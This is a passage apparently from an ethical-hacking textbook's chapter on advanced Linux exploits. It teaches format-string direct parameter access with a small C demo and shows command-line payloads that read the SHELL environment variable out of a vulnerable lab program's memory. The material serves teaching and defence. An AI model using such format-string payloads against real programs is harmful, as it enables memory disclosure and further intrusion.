To dump all environment variables for your current session,
type ???env | more??? at the shell prompt.
Gray Hat Hacking: The Ethical Hacker??™s Handbook
174
Chapter 8: Advanced Linux Exploits
175
PART III
Simplifying with Direct Parameter Access
To make things even easier, you may even access the fourth parameter from the stack by
what is called direct parameter access. The #$ format token is used to direct the format
function to jump over a number of parameters and select one directly. For example:
$cat dirpar.c
//dirpar.c
main(){
printf ("This is a %3$s.\n", 1, 2, "test");
}
$gcc -o dirpar dirpar.c
$./dirpar
This is a test.
$
Now when using the direct parameter format token from the command line, you
need to escape the $ with a \ in order to keep the shell from interpreting it. Let??™s put this
all to use and reprint the location of the SHELL environment variable:
$ ./fmtstr `printf "\x84\xfd\xff\xbf"`"%4\$s"
??????/bin/bash
Canary at 0x08049440 = 0x00000000
Notice how short the format string can be now.
CAUTION The preceding format works for bash. Other shells such as tcsh
require other formats, for example:
$ ./fmtstr `printf "\x84\xfd\xff\xbf"`'%4\$s'
Notice the use of a single quote on the end.
Pages:
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352